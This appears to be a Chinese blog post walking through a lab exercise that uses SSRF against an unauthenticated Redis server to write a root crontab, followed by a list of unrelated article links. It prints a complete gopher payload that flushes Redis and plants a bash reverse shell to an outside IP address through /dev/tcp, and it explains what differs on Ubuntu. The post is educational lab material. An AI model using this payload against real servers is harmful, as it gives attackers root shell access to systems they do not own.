当前位置: 首页 > news >正文

ssrf+redis未授权访问写入任务计划

目录

项目地址:

探测端口

写入任务计划


项目地址:

GitHub - rhamaa/Web-Hacking-Lab: :fire: Lab To Pratice Web Hacking :smile_cat:

探测端口

发现6379端口打开了的

这里也可以用bp探测端口

写入任务计划

这个根目录下面有个利用工具

这个工具可以写任务计划,ssh,和反序列化

看看他在做什么

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$75*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.201.142/12345 0>&1'*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

此时已经反弹成功了

为什么这里是root用户:因为在redis低版本中它没有降权,所以执行的时候使用是root

我们目前的版本是

这里我们写入的是centos,不是ubuntu,如果我们要写入ubuntu任务计划的话就不会这么顺利:在Ubuntu反弹shell需要特别注意的一点是这的root文件的权限必须为600,在ubuntu中/bin/sh这个软连接指向了dash,而我们反弹shell使用的shell环境是bash,所以这一点是反弹出错的根本原因,需要满足以上两种条件才能反弹shell


http://www.mrgr.cn/news/11180.html

相关文章:

  • 岩土工程中的有限单元法:渗流问题的理论探索与编程实践
  • springboot springmvc spring区别
  • 上线eleme项目
  • 【2024年Python股票量化分析】实测可用的免费股票数据接口集合:实时数据、历史数据、基本面数据、财务数据API文档
  • sql高并发如何解决
  • Nginx 反向代理实现 Tomcat 高可用性负载均衡详解
  • 基于单片机的电子指南针设计
  • Excel公式与图表自动化:在Python中操作Excel公式并自动化生成图表
  • redis的RDB快照配置详解
  • 浅说树及其基本性质(上)
  • Axure设计之动态条形图教程(中继器)
  • MySQL(面试篇)
  • Neo4j - CQL简介
  • LoadBalancer负载均衡
  • 前端实现两张图片合成,图片换背景,简单p图程序
  • 【电脑使用耳机录音注意事项】
  • LeetCode.55.跳跃游戏(贪心算法思路)
  • 【国产游戏技术:能否引领全球?】
  • 数学建模学习(124):使用Python实现模糊ARAS方法从原理到实战
  • 集合及数据结构第九节————树和二叉树